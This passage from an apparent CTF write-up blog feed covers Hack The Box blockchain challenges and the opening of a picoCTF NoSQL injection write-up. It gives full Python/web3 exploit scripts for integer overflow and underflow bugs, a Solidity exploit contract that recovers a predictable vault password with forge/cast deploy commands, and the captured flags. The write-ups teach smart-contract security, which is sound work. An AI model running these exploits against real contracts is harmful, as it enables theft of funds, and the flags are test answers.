style="color:#e6db74">&#34;data&#34;</span>: sel}), <span style="color:#e6db74">&#34;big&#34;</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">top_bidder</span>(): </span></span><span style="display:flex;"><span> r <span style="color:#f92672">=</span> w3<span style="color:#f92672">.</span>eth<span style="color:#f92672">.</span>call({<span style="color:#e6db74">&#34;to&#34;</span>: TARGET, <span style="color:#e6db74">&#34;data&#34;</span>: sel_top}) </span></span><span style="display:flex;"><span> addr, bid <span style="color:#f92672">=</span> decode([<span style="color:#e6db74">&#34;address&#34;</span>, <span style="color:#e6db74">&#34;uint64&#34;</span>], r) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> Web3<span style="color:#f92672">.</span>to_checksum_address(addr), int(bid) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">send</span>(acct, to, value<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span>, data<span style="color:#f92672">=</span><span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;&#34;</span>, gas<span style="color:#f92672">=</span><span style="color:#ae81ff">220000</span>): </span></span><span style="display:flex;"><span> tx <span style="color:#f92672">=</span> { </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;chainId&#34;</span>: w3<span style="color:#f92672">.</span>eth<span style="color:#f92672">.</span>chain_id, </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;nonce&#34;</span>: w3<span style="color:#f92672">.</span>eth<span style="color:#f92672">.</span>get_transaction_count(acct<span style="color:#f92672">.</span>address), </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;to&#34;</span>: to, </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;value&#34;</span>: value, </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;data&#34;</span>: data, </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;gas&#34;</span>: gas, </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;maxFeePerGas&#34;</span>: w3<span style="color:#f92672">.</span>to_wei(<span style="color:#ae81ff">2</span>, <span style="color:#e6db74">&#34;gwei&#34;</span>), </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;maxPriorityFeePerGas&#34;</span>: w3<span style="color:#f92672">.</span>to_wei(<span style="color:#ae81ff">1</span>, <span style="color:#e6db74">&#34;gwei&#34;</span>), </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> stx <span style="color:#f92672">=</span> acct<span style="color:#f92672">.</span>sign_transaction(tx) </span></span><span style="display:flex;"><span> h <span style="color:#f92672">=</span> w3<span style="color:#f92672">.</span>eth<span style="color:#f92672">.</span>send_raw_transaction(stx<span style="color:#f92672">.</span>raw_transaction) </span></span><span style="display:flex;"><span> r <span style="color:#f92672">=</span> w3<span style="color:#f92672">.</span>eth<span style="color:#f92672">.</span>wait_for_transaction_receipt(h) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> h<span style="color:#f92672">.</span>hex(), r<span style="color:#f92672">.</span>status </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># fund second EOA for gas</span> </span></span><span style="display:flex;"><span>print(send(acctA, acctB<span style="color:#f92672">.</span>address, value<span style="color:#f92672">=</span>w3<span style="color:#f92672">.</span>to_wei(<span style="color:#ae81ff">1</span>, <span style="color:#e6db74">&#34;ether&#34;</span>), gas<span style="color:#f92672">=</span><span style="color:#ae81ff">21000</span>)) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># set top bid to 2^63</span> </span></span><span style="display:flex;"><span>print(send(acctA, TARGET, value<span style="color:#f92672">=</span>(<span style="color:#ae81ff">1</span> <span style="color:#f92672">&lt;&lt;</span> <span style="color:#ae81ff">63</span>))) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># overflow timeout with alternating 0-value bids</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> i <span style="color:#f92672">in</span> range(<span style="color:#ae81ff">1</span>, <span style="color:#ae81ff">260</span>): </span></span><span style="display:flex;"><span> cur_top, _ <span style="color:#f92672">=</span> top_bidder() </span></span><span style="display:flex;"><span> nxt <span style="color:#f92672">=</span> acctB <span style="color:#66d9ef">if</span> cur_top<span style="color:#f92672">.</span>lower() <span style="color:#f92672">==</span> PLAYER<span style="color:#f92672">.</span>lower() <span style="color:#66d9ef">else</span> acctA </span></span><span style="display:flex;"><span> txh, st <span style="color:#f92672">=</span> send(nxt, TARGET, value<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span>, gas<span style="color:#f92672">=</span><span style="color:#ae81ff">120000</span>) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> st <span style="color:#f92672">!=</span> <span style="color:#ae81ff">1</span>: </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">raise</span> <span style="color:#a6e22e">RuntimeError</span>(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;zero-bid failed at step </span><span style="color:#e6db74">{</span>i<span style="color:#e6db74">}</span><span style="color:#e6db74">: </span><span style="color:#e6db74">{</span>txh<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> tmo <span style="color:#f92672">=</span> call_u256(TARGET, sel_timeout) </span></span><span style="display:flex;"><span> now <span style="color:#f92672">=</span> w3<span style="color:#f92672">.</span>eth<span style="color:#f92672">.</span>get_block(<span style="color:#e6db74">&#34;latest&#34;</span>)<span style="color:#f92672">.</span>timestamp </span></span><span style="display:flex;"><span> top, bid <span style="color:#f92672">=</span> top_bidder() </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> tmo <span style="color:#f92672">&lt;</span> now <span style="color:#f92672">and</span> top<span style="color:#f92672">.</span>lower() <span style="color:#f92672">==</span> PLAYER<span style="color:#f92672">.</span>lower(): </span></span><span style="display:flex;"><span> print(<span style="color:#e6db74">&#34;ready&#34;</span>, i, <span style="color:#e6db74">&#34;timeout&#34;</span>, tmo, <span style="color:#e6db74">&#34;now&#34;</span>, now, <span style="color:#e6db74">&#34;top&#34;</span>, top, <span style="color:#e6db74">&#34;bid&#34;</span>, bid) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">break</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># claim</span> </span></span><span style="display:flex;"><span>print(send(acctA, TARGET, data<span style="color:#f92672">=</span>sel_claim, gas<span style="color:#f92672">=</span><span style="color:#ae81ff">150000</span>)) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>solved_raw <span style="color:#f92672">=</span> w3<span style="color:#f92672">.</span>eth<span style="color:#f92672">.</span>call({ </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;to&#34;</span>: SETUP, </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;data&#34;</span>: sel_solved <span style="color:#f92672">+</span> bytes<span style="color:#f92672">.</span>fromhex(PLAYER[<span style="color:#ae81ff">2</span>:]<span style="color:#f92672">.</span>rjust(<span style="color:#ae81ff">64</span>, <span style="color:#e6db74">&#34;0&#34;</span>)) </span></span><span style="display:flex;"><span>}) </span></span><span style="display:flex;"><span>print(<span style="color:#e6db74">&#34;isSolved:&#34;</span>, int<span style="color:#f92672">.</span>from_bytes(solved_raw, <span style="color:#e6db74">&#34;big&#34;</span>) <span style="color:#f92672">==</span> <span style="color:#ae81ff">1</span>) </span></span><span style="display:flex;"><span>print(<span style="color:#e6db74">&#34;flag:&#34;</span>, requests<span style="color:#f92672">.</span>get(BASE <span style="color:#f92672">+</span> <span style="color:#e6db74">&#34;/flag&#34;</span>, timeout<span style="color:#f92672">=</span><span style="color:#ae81ff">10</span>)<span style="color:#f92672">.</span>text) </span></span></code></pre></div><h2 id="flag">Flag</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>HTB{0v32f10w_70_w1n_7h3_4uc710n} </span></span></code></pre></div></pagevault> /posts/htb-blockchain-token-to-wonderland/ Wed, 25 Feb 2026 01:42:00 +0700 /posts/htb-blockchain-token-to-wonderland/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> Token to Wonderland</li> <li><strong>Category:</strong> Blockchain</li> <li><strong>Difficulty:</strong> Easy</li> <li><strong>Goal condition:</strong> become owner of item index <code>2</code> (<code>Golden Key</code>)</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="root-cause">Root Cause</h2> <p>The token contract uses Solidity 0.7 unchecked arithmetic and validates transfer with:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-solidity" data-lang="solidity"><span style="display:flex;"><span>require(fromBalance <span style="color:#f92672">-</span> amount <span style="color:#f92672">&gt;=</span> <span style="color:#ae81ff">0</span>, <span style="color:#e6db74">&#34;ERC20: transfer amount exceeds balance&#34;</span>); </span></span></code></pre></div><p>That condition is broken in 0.7: subtraction underflow wraps instead of reverting.</p> <h2 id="exploit-chain">Exploit Chain</h2> <ol> <li>Start with player balance = <code>100</code>.</li> <li>Transfer <code>101</code> → underflow balance to huge value.</li> <li>Approve Shop to spend large amount.</li> <li>Call <code>buyItem(2)</code> for <code>Golden Key</code>.</li> </ol> <h2 id="full-poc-script-pythonweb3">Full PoC Script (Python/web3)</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#75715e">#!/usr/bin/env python3</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> requests </span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> web3 <span style="color:#f92672">import</span> Web3 </span></span><span style="display:flex;"><span><span style="color:#f92672">from</span> eth_utils <span style="color:#f92672">import</span> keccak </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>BASE <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;http://&lt;INSTANCE_IP&gt;:&lt;PORT&gt;&#34;</span> </span></span><span style="display:flex;"><span>RPC <span style="color:#f92672">=</span> BASE <span style="color:#f92672">+</span> <span style="color:#e6db74">&#34;/rpc&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>info <span style="color:#f92672">=</span> requests<span style="color:#f92672">.</span>get(BASE <span style="color:#f92672">+</span> <span style="color:#e6db74">&#34;/connection_info&#34;</span>, timeout<span style="color:#f92672">=</span><span style="color:#ae81ff">10</span>)<span style="color:#f92672">.</span>json() </span></span><span style="display:flex;"><span>priv <span style="color:#f92672">=</span> info[<span style="color:#e6db74">&#34;PrivateKey&#34;</span>] </span></span><span style="display:flex;"><span>player <span style="color:#f92672">=</span> Web3<span style="color:#f92672">.</span>to_checksum_address(info[<span style="color:#e6db74">&#34;Address&#34;</span>]) </span></span><span style="display:flex;"><span>shop <span style="color:#f92672">=</span> Web3<span style="color:#f92672">.</span>to_checksum_address(info[<span style="color:#e6db74">&#34;TargetAddress&#34;</span>]) </span></span><span style="display:flex;"><span>setup <span style="color:#f92672">=</span> Web3<span style="color:#f92672">.</span>to_checksum_address(info[<span style="color:#e6db74">&#34;setupAddress&#34;</span>]) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>w3 <span style="color:#f92672">=</span> Web3(Web3<span style="color:#f92672">.</span>HTTPProvider(RPC)) </span></span><span style="display:flex;"><span>acct <span style="color:#f92672">=</span> w3<span style="color:#f92672">.</span>eth<span style="color:#f92672">.</span>account<span style="color:#f92672">.</span>from_key(priv) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Shop storage slot 1 holds SilverCoin address</span> </span></span><span style="display:flex;"><span>slot1 <span style="color:#f92672">=</span> w3<span style="color:#f92672">.</span>eth<span style="color:#f92672">.</span>get_storage_at(shop, <span style="color:#ae81ff">1</span>) </span></span><span style="display:flex;"><span>silver <span style="color:#f92672">=</span> Web3<span style="color:#f92672">.</span>to_checksum_address(<span style="color:#e6db74">&#34;0x&#34;</span> <span style="color:#f92672">+</span> slot1<span style="color:#f92672">.</span>hex()[<span style="color:#f92672">-</span><span style="color:#ae81ff">40</span>:]) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>sig_transfer <span style="color:#f92672">=</span> keccak(text<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;transfer(address,uint256)&#34;</span>)[:<span style="color:#ae81ff">4</span>] </span></span><span style="display:flex;"><span>sig_approve <span style="color:#f92672">=</span> keccak(text<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;approve(address,uint256)&#34;</span>)[:<span style="color:#ae81ff">4</span>] </span></span><span style="display:flex;"><span>sig_buy <span style="color:#f92672">=</span> keccak(text<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;buyItem(uint256)&#34;</span>)[:<span style="color:#ae81ff">4</span>] </span></span><span style="display:flex;"><span>sig_solved <span style="color:#f92672">=</span> keccak(text<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;isSolved(address)&#34;</span>)[:<span style="color:#ae81ff">4</span>] </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">pad32</span>(x: int) <span style="color:#f92672">-&gt;</span> bytes: </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> x<span style="color:#f92672">.</span>to_bytes(<span style="color:#ae81ff">32</span>, <span style="color:#e6db74">&#34;big&#34;</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">pad_addr</span>(a: str) <span style="color:#f92672">-&gt;</span> bytes: </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> bytes<span style="color:#f92672">.</span>fromhex(a[<span style="color:#ae81ff">2</span>:]<span style="color:#f92672">.</span>rjust(<span style="color:#ae81ff">64</span>, <span style="color:#e6db74">&#34;0&#34;</span>)) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">send</span>(to, data, gas<span style="color:#f92672">=</span><span style="color:#ae81ff">180000</span>): </span></span><span style="display:flex;"><span> tx <span style="color:#f92672">=</span> { </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;chainId&#34;</span>: w3<span style="color:#f92672">.</span>eth<span style="color:#f92672">.</span>chain_id, </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;nonce&#34;</span>: w3<span style="color:#f92672">.</span>eth<span style="color:#f92672">.</span>get_transaction_count(player), </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;to&#34;</span>: to, </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;value&#34;</span>: <span style="color:#ae81ff">0</span>, </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;gas&#34;</span>: gas, </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;data&#34;</span>: data, </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;maxFeePerGas&#34;</span>: w3<span style="color:#f92672">.</span>to_wei(<span style="color:#ae81ff">2</span>, <span style="color:#e6db74">&#34;gwei&#34;</span>), </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;maxPriorityFeePerGas&#34;</span>: w3<span style="color:#f92672">.</span>to_wei(<span style="color:#ae81ff">1</span>, <span style="color:#e6db74">&#34;gwei&#34;</span>), </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> stx <span style="color:#f92672">=</span> acct<span style="color:#f92672">.</span>sign_transaction(tx) </span></span><span style="display:flex;"><span> h <span style="color:#f92672">=</span> w3<span style="color:#f92672">.</span>eth<span style="color:#f92672">.</span>send_raw_transaction(stx<span style="color:#f92672">.</span>raw_transaction) </span></span><span style="display:flex;"><span> r <span style="color:#f92672">=</span> w3<span style="color:#f92672">.</span>eth<span style="color:#f92672">.</span>wait_for_transaction_receipt(h) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> h<span style="color:#f92672">.</span>hex(), r<span style="color:#f92672">.</span>status </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># 1) Underflow</span> </span></span><span style="display:flex;"><span>print(send(silver, sig_transfer <span style="color:#f92672">+</span> pad_addr(shop) <span style="color:#f92672">+</span> pad32(<span style="color:#ae81ff">101</span>), gas<span style="color:#f92672">=</span><span style="color:#ae81ff">120000</span>)) </span></span><span style="display:flex;"><span><span style="color:#75715e"># 2) Approve</span> </span></span><span style="display:flex;"><span>print(send(silver, sig_approve <span style="color:#f92672">+</span> pad_addr(shop) <span style="color:#f92672">+</span> pad32(<span style="color:#ae81ff">30_000_000</span>), gas<span style="color:#f92672">=</span><span style="color:#ae81ff">120000</span>)) </span></span><span style="display:flex;"><span><span style="color:#75715e"># 3) Buy key</span> </span></span><span style="display:flex;"><span>print(send(shop, sig_buy <span style="color:#f92672">+</span> pad32(<span style="color:#ae81ff">2</span>), gas<span style="color:#f92672">=</span><span style="color:#ae81ff">180000</span>)) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>solved_raw <span style="color:#f92672">=</span> w3<span style="color:#f92672">.</span>eth<span style="color:#f92672">.</span>call({<span style="color:#e6db74">&#34;to&#34;</span>: setup, <span style="color:#e6db74">&#34;data&#34;</span>: sig_solved <span style="color:#f92672">+</span> pad_addr(player)}) </span></span><span style="display:flex;"><span>print(<span style="color:#e6db74">&#34;isSolved:&#34;</span>, int<span style="color:#f92672">.</span>from_bytes(solved_raw, <span style="color:#e6db74">&#34;big&#34;</span>) <span style="color:#f92672">==</span> <span style="color:#ae81ff">1</span>) </span></span><span style="display:flex;"><span>print(<span style="color:#e6db74">&#34;flag:&#34;</span>, requests<span style="color:#f92672">.</span>get(BASE <span style="color:#f92672">+</span> <span style="color:#e6db74">&#34;/flag&#34;</span>, timeout<span style="color:#f92672">=</span><span style="color:#ae81ff">10</span>)<span style="color:#f92672">.</span>text) </span></span></code></pre></div><h2 id="flag">Flag</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>HTB{und32f10w_70_937_7h3_k3y} </span></span></code></pre></div></pagevault> /posts/htb-blockchain-magic-vault/ Wed, 25 Feb 2026 01:41:00 +0700 /posts/htb-blockchain-magic-vault/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> Magic Vault</li> <li><strong>Category:</strong> Blockchain</li> <li><strong>Difficulty:</strong> Easy</li> <li><strong>Goal condition:</strong> make <code>TARGET.mapHolder() != address(TARGET)</code></li> </ul> <pagevault hint="Ask bz for access"> <h2 id="root-cause">Root Cause</h2> <p><code>unlock(bytes16)</code> depends on internal key material derived from <code>_magicPassword()</code>, where constructor-time <code>passphrase</code> derivation uses:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-solidity" data-lang="solidity"><span style="display:flex;"><span>keccak256(abi.encodePacked(<span style="color:#66d9ef">uint256</span>(blockhash(block.timestamp)))) </span></span></code></pre></div><p>In constructor context, that blockhash path is effectively deterministic for this challenge deployment pattern. Combined with strict but satisfiable bit-layout checks, the lock can be opened reliably.</p> <h2 id="exploit-contract-full-poc">Exploit Contract (Full PoC)</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-solidity" data-lang="solidity"><span style="display:flex;"><span><span style="color:#75715e">// SPDX-License-Identifier: UNLICENSED </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">pragma solidity</span> <span style="color:#f92672">^</span><span style="color:#ae81ff">0</span>.<span style="color:#ae81ff">8</span>.<span style="color:#ae81ff">13</span>; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">interface</span> <span style="color:#a6e22e">IVault</span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">function</span> <span style="color:#a6e22e">nonce</span>() <span style="color:#66d9ef">external</span> <span style="color:#66d9ef">view</span> <span style="color:#66d9ef">returns</span> (<span style="color:#66d9ef">uint256</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">function</span> <span style="color:#a6e22e">owner</span>() <span style="color:#66d9ef">external</span> <span style="color:#66d9ef">view</span> <span style="color:#66d9ef">returns</span> (<span style="color:#66d9ef">address</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">function</span> <span style="color:#a6e22e">unlock</span>(<span style="color:#66d9ef">bytes16</span> _password) <span style="color:#66d9ef">external</span>; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">function</span> <span style="color:#a6e22e">claimContent</span>() <span style="color:#66d9ef">external</span>; </span></span><span style="display:flex;"><span>} </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">contract</span> <span style="color:#a6e22e">Exploit</span> { </span></span><span style="display:flex;"><span> IVault <span style="color:#66d9ef">public</span> target; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint256</span> <span style="color:#66d9ef">private</span> n; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">constructor</span>(<span style="color:#66d9ef">address</span> _target) { </span></span><span style="display:flex;"><span> target <span style="color:#f92672">=</span> IVault(_target); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">function</span> <span style="color:#a6e22e">_generateKey</span>(<span style="color:#66d9ef">uint256</span> _reductor) <span style="color:#66d9ef">private</span> <span style="color:#66d9ef">returns</span> (<span style="color:#66d9ef">uint256</span> ret) { </span></span><span style="display:flex;"><span> ret <span style="color:#f92672">=</span> <span style="color:#66d9ef">uint256</span>(keccak256(abi.encodePacked(<span style="color:#66d9ef">uint256</span>(blockhash(block.number <span style="color:#f92672">-</span> _reductor)) <span style="color:#f92672">+</span> n))); </span></span><span style="display:flex;"><span> n<span style="color:#f92672">++</span>; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">function</span> <span style="color:#a6e22e">_magicPassword</span>() <span style="color:#66d9ef">private</span> <span style="color:#66d9ef">returns</span> (<span style="color:#66d9ef">bytes8</span>) { </span></span><span style="display:flex;"><span> n <span style="color:#f92672">=</span> target.nonce(); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint256</span> key1 <span style="color:#f92672">=</span> _generateKey(block.timestamp <span style="color:#f92672">%</span> <span style="color:#ae81ff">2</span> <span style="color:#f92672">+</span> <span style="color:#ae81ff">1</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint128</span> key2 <span style="color:#f92672">=</span> <span style="color:#66d9ef">uint128</span>(_generateKey(<span style="color:#ae81ff">2</span>)); </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">bytes32</span> passphrase <span style="color:#f92672">=</span> keccak256(abi.encodePacked(<span style="color:#66d9ef">uint256</span>(<span style="color:#ae81ff">0</span>))); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">bytes8</span> secret <span style="color:#f92672">=</span> <span style="color:#66d9ef">bytes8</span>( </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">bytes16</span>( </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint128</span>( </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint128</span>(<span style="color:#66d9ef">bytes16</span>(<span style="color:#66d9ef">bytes32</span>(<span style="color:#66d9ef">uint256</span>(<span style="color:#66d9ef">uint256</span>(passphrase) <span style="color:#f92672">^</span> key1)))) <span style="color:#f92672">^</span> key2 </span></span><span style="display:flex;"><span> ) </span></span><span style="display:flex;"><span> ) </span></span><span style="display:flex;"><span> ); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> (secret <span style="color:#f92672">&gt;&gt;</span> <span style="color:#ae81ff">32</span> <span style="color:#f92672">|</span> secret <span style="color:#f92672">&lt;&lt;</span> <span style="color:#ae81ff">16</span>); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">function</span> <span style="color:#a6e22e">pwn</span>() <span style="color:#66d9ef">external</span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64</span> ownerPart <span style="color:#f92672">=</span> <span style="color:#66d9ef">uint64</span>(<span style="color:#66d9ef">uint160</span>(target.owner())); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64</span> secretPart <span style="color:#f92672">=</span> <span style="color:#66d9ef">uint64</span>(_magicPassword()); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">bytes16</span> key <span style="color:#f92672">=</span> <span style="color:#66d9ef">bytes16</span>((<span style="color:#66d9ef">uint128</span>(ownerPart) <span style="color:#f92672">&lt;&lt;</span> <span style="color:#ae81ff">64</span>) <span style="color:#f92672">|</span> secretPart); </span></span><span style="display:flex;"><span> target.unlock(key); </span></span><span style="display:flex;"><span> target.claimContent(); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span>} </span></span></code></pre></div><h2 id="deployment--execution">Deployment / Execution</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>forge create --broadcast Exploit.sol:Exploit <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span> --rpc-url <span style="color:#e6db74">&#34;</span>$RPC<span style="color:#e6db74">&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span> --private-key <span style="color:#e6db74">&#34;</span>$PRIV<span style="color:#e6db74">&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span> --constructor-args <span style="color:#e6db74">&#34;</span>$TARGET<span style="color:#e6db74">&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>cast send <span style="color:#e6db74">&#34;</span>$EXPLOIT_ADDR<span style="color:#e6db74">&#34;</span> <span style="color:#e6db74">&#34;pwn()&#34;</span> --rpc-url <span style="color:#e6db74">&#34;</span>$RPC<span style="color:#e6db74">&#34;</span> --private-key <span style="color:#e6db74">&#34;</span>$PRIV<span style="color:#e6db74">&#34;</span> </span></span></code></pre></div><h2 id="flag">Flag</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>HTB{3ve2yth1n9_15_pu811c_1n_7h3_810ckch41n} </span></span></code></pre></div></pagevault> /posts/htb-blockchain-honor-among-thieves/ Wed, 25 Feb 2026 01:40:00 +0700 /posts/htb-blockchain-honor-among-thieves/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> Honor Among Thieves</li> <li><strong>Category:</strong> Blockchain</li> <li><strong>Difficulty:</strong> Easy</li> <li><strong>Goal condition:</strong> force <code>isSolved(player) == true</code></li> </ul> <p>This challenge is a good reminder that <strong>on-chain history is public</strong> and exploitable. Instead of brute-forcing secret material, we used transaction/event intelligence and replayed the winning primitive.</p> <pagevault hint="Ask bz for access"> <h2 id="root-cause">Root Cause</h2> <p>The contract flow leaked enough information via prior chain interactions (logs/calldata context) to recover a valid key used by the target logic.</p> /posts/0x4-learn-ctf-web-exploitation/ Tue, 24 Feb 2026 12:58:00 +0700 /posts/0x4-learn-ctf-web-exploitation/ <h2 id="table-of-contents">Table of Contents</h2> <ul> <li><a href="#no-sql-injection-picoctf">No SQL Injection (picoCTF)</a></li> <li><a href="#startup-company-picoctf">Startup Company (picoCTF)</a></li> </ul> <hr> <h2 id="no-sql-injection-picoctf">No SQL Injection (picoCTF)</h2> <h3 id="summary">Summary</h3> <ul> <li><strong>Category:</strong> Web / NoSQL Injection</li> <li><strong>Challenge:</strong> <code>No SQL Injection</code></li> <li><strong>Target:</strong> <code>http://atlas.picoctf.net:54182/</code></li> <li><strong>Goal:</strong> bypass login and recover flag token.</li> </ul> <h3 id="source-analysis">Source analysis</h3> <p>From <code>server.js</code>, login handler parses user input like this:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-js" data-lang="js"><span style="display:flex;"><span><span style="color:#a6e22e">email</span><span style="color:#f92672">:</span> </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">email</span>.<span style="color:#a6e22e">startsWith</span>(<span style="color:#e6db74">&#34;{&#34;</span>) <span style="color:#f92672">&amp;&amp;</span> <span style="color:#a6e22e">email</span>.<span style="color:#a6e22e">endsWith</span>(<span style="color:#e6db74">&#34;}&#34;</span>) </span></span><span style="display:flex;"><span> <span style="color:#f92672">?</span> <span style="color:#a6e22e">JSON</span>.<span style="color:#a6e22e">parse</span>(<span 